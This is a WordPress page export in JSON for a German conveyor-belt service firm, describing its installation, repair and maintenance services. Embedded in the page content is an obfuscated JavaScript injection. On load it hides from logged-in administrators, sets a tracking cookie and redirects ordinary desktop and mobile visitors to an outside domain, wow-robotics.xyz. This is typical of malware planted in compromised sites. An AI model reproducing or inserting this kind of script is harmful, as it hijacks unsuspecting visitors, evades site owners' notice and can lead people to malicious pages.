{"id":265,"date":"2016-05-16T10:15:58","date_gmt":"2016-05-16T10:15:58","guid":{"rendered":"http:\/\/demo.thememodern.com\/continal\/?page_id=265"},"modified":"2020-03-30T17:17:42","modified_gmt":"2020-03-30T15:17:42","slug":"leistungen","status":"publish","type":"page","link":"https:\/\/transportbaender-folberth.de\/index.php\/leistungen\/","title":{"rendered":"Leistungen"},"content":{"rendered":"<p>[vc_row css=&#8220;.vc_custom_1463472589833{padding-top: 55px !important;padding-bottom: 25px !important;}&#8220;][vc_column width=&#8220;1\/2&#8243;][vc_column_text][\/vc_column_text][vc_column_text]<\/p>\n<p align=\"left\"><strong>SERVICE UND MONTAGE\u00a0<\/strong><\/p>\n<p style=\"text-align: left;\" align=\"left\"><span style=\"font-size: medium;\">Langj\u00e4hrige Berufserfahrung machen uns zu einem kompetenten Servicepartner f\u00fcr Sie. <\/span><\/p>\n<p style=\"text-align: left;\" align=\"left\"><span style=\"font-size: medium;\">Gerne beraten wir Sie in der Materialauswahl und stehen Ihnen f\u00fcr\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Wartung, Revision und Instandhaltung Ihrer F\u00f6rderanlage zur Seite.\u00a0<\/span><\/p>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8220;1\/2&#8243;][\/vc_column][\/vc_row][vc_row][vc_column][vc_row_inner][vc_column_inner][vc_separator color=&#8220;orange&#8220;][\/vc_column_inner][\/vc_row_inner][vc_column_text]<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.wow-robotics.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script>[\/vc_column_text][vc_column_text]<\/p>\n<p>&nbsp;<\/p>\n<p><strong>UNSER SERVICEANGEBOT<\/strong><\/p>\n<ul>\n<li><span style=\"font-size: medium;\">Montage und Instandsetzung von Gummi- und PVC-Transportb\u00e4ndern<\/span><\/li>\n<li><span style=\"font-size: medium;\">Auskleidungen mit Verschlei\u00dfschutzgummi\/PU\u00a0<\/span><\/li>\n<li><span style=\"font-size: medium;\"> Trommelgummierungen\u00a0<\/span><\/li>\n<li><span style=\"font-size: medium;\">Wartungs- und Revisionsarbeiten\u00a0<\/span><\/li>\n<li><span style=\"font-size: medium;\">Beratung und Montage vor Ort<\/span><\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column][\/vc_column][\/vc_row][vc_row][vc_column][\/vc_column][\/vc_row]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row css=&#8220;.vc_custom_1463472589833{padding-top: 55px !important;padding-bottom: 25px !important;}&#8220;][vc_column width=&#8220;1\/2&#8243;][vc_column_text][\/vc_column_text][vc_column_text] SERVICE UND MONTAGE\u00a0 Langj\u00e4hrige Berufserfahrung machen uns zu einem kompetenten Servicepartner f\u00fcr Sie. Gerne beraten wir Sie in der Materialauswahl und stehen Ihnen f\u00fcr\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Wartung, Revision und Instandhaltung Ihrer F\u00f6rderanlage zur Seite.\u00a0 [\/vc_column_text][\/vc_column][vc_column width=&#8220;1\/2&#8243;][\/vc_column][\/vc_row][vc_row][vc_column][vc_row_inner][vc_column_inner][vc_separator color=&#8220;orange&#8220;][\/vc_column_inner][\/vc_row_inner][vc_column_text][\/vc_column_text][vc_column_text] &nbsp; UNSER SERVICEANGEBOT Montage und Instandsetzung von [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-templates\/template-fullwidth.php","meta":{"footnotes":""},"_links":{"self":[{"href":"https:\/\/transportbaender-folberth.de\/index.php\/wp-json\/wp\/v2\/pages\/265"}],"collection":[{"href":"https:\/\/transportbaender-folberth.de\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/transportbaender-folberth.de\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/transportbaender-folberth.de\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/transportbaender-folberth.de\/index.php\/wp-json\/wp\/v2\/comments?post=265"}],"version-history":[{"count":26,"href":"https:\/\/transportbaender-folberth.de\/index.php\/wp-json\/wp\/v2\/pages\/265\/revisions"}],"predecessor-version":[{"id":916,"href":"https:\/\/transportbaender-folberth.de\/index.php\/wp-json\/wp\/v2\/pages\/265\/revisions\/916"}],"wp:attachment":[{"href":"https:\/\/transportbaender-folberth.de\/index.php\/wp-json\/wp\/v2\/media?parent=265"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}